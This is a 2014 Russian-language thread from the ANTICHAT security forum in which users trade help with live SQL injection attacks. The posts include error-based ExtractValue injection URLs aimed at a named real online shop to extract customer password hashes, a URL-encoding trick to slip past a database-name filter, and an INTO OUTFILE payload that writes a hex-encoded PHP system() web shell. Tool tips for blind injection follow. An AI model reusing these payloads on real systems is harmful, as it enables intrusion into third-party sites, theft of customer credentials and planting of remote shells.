HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23861  
Старый 06.11.2014, 15:55
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Есть Error based Injection.

Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм

Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать?

норм

Код HTML:
HTML:
_http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1
ошибка

Код HTML:
HTML:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
 
Ответить с цитированием

  #23862  
Старый 07.11.2014, 01:36
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

действительно фильтр на имя бд. помогло урл кодирование:

Код:
Code:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+forma%67%67iodb_osc.customers+limit+0,1))))=1
где %6767 = gg, то есть имя бд formaggiodb_osc
 
Ответить с цитированием

  #23863  
Старый 07.11.2014, 17:47
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034

Репутация: 0
По умолчанию

Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.

делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245 F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --

Файл не заливается.

По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
 
Ответить с цитированием

  #23864  
Старый 07.11.2014, 17:53
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от Sanic1977  
Sanic1977 said:
Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.
делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245 F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --
Файл не заливается.
По ходу дела фильтрация на кавычки. Как обойти и залить шелл?
/showpost.php?p=663815&postcount=39

/threadnav34338-1-10.html

соответственно, mg=on и mq=off
 
Ответить с цитированием

  #23865  
Старый 08.11.2014, 18:07
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?
 
Ответить с цитированием

  #23866  
Старый 08.11.2014, 18:22
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?
php+curl
 
Ответить с цитированием

  #23867  
Старый 08.11.2014, 18:31
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от UXOR  
UXOR said:
php+curl
хотелось бы готовое решение, есть такие скрипты?
 
Ответить с цитированием

  #23868  
Старый 09.11.2014, 00:00
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

вряд ли будет готовое решение: случай индивидуальный, плюс, такое пишется довольно быстро можешь отписать мне в жабу, разберемся, либо посмотри сам, там не особо сложный скрипт выйдет.
 
Ответить с цитированием

  #23869  
Старый 09.11.2014, 00:18
-=Cerberus=-
Guest
Сообщений: n/a
Провел на форуме:
343026

Репутация: 391
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
хотелось бы готовое решение, есть такие скрипты?
эм, а с какого момента у нас SQLMAP из моды вышел? там вроде все есть -r путь до текстовика с POStом
 
Ответить с цитированием

  #23870  
Старый 09.11.2014, 00:23
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
хотелось бы готовое решение, есть такие скрипты?
Вот как пример скрипта:

/showpost.php?p=3739236&postcount=6

тебе только остается написать цикл под свой случай!

Цитата:
Сообщение от -=Cerberus=-  
-=Cerberus=- said:
эм, а с какого момента у нас SQLMAP из моды вышел? там вроде все есть -r путь до текстовика с POStом
Бывает попадаются такие уязвимости, что не один софт не возьмет из широко используемых в паблике, приходится писать самим скрипты для автоматизации.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ